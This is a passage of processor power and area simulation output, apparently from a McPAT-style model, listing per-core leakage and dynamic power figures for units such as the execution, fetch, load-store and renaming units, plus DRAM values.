'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.291751,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.128974,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.20803,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.105006,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.44201,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.102778,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.53858,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0551181,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00540973,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0594634,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0400083,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114581,
'Execution Unit/Register Files/Runtime Dynamic': 0.045418,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.138832,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.327911,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.466,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000569244,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000569244,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000514967,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000209829,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000574722,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00222818,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00477343,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.038461,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.44645,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0992052,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.130631,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.78369,
'Instruction Fetch Unit/Runtime Dynamic': 0.275299,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398849,
'L2/Runtime Dynamic': 0.0072389,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.62402,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.67604,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0448694,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0448695,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.8359,
'Load Store Unit/Runtime Dynamic': 0.94219,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.11064,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.221281,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0392666,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0398373,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.152111,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0163474,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.375673,
'Memory Management Unit/Runtime Dynamic': 0.0561847,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.1632,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.14499,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00758344,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0629768,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.215551,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.96246,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0529102,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.244246,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.270256,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0878707,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.141732,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0715416,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.301145,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0590634,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.42336,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0510571,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00368569,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0470898,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0272579,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0981469,
'Execution Unit/Register Files/Runtime Dynamic': 0.0309436,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.112436,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.232057,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.21377,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000249816,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000249816,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000226678,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 9.27219e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000391563,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00111787,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00207049,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0262038,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.66679,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0613393,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0889998,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.96619,
'Instruction Fetch Unit/Runtime Dynamic': 0.179731,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0285357,
'L2/Runtime Dynamic': 0.00792079,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.99531,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.376367,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0245292,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0245291,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.11114,
'Load Store Unit/Runtime Dynamic': 0.521865,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0604848,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.120969,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0214663,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0218912,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.103635,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0100662,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.296619,
'Memory Management Unit/Runtime Dynamic': 0.0319575,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.4153,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.134308,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00559899,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0419014,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.181809,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.13705,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.992947460345098,
'Runtime Dynamic': 5.992947460345098,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
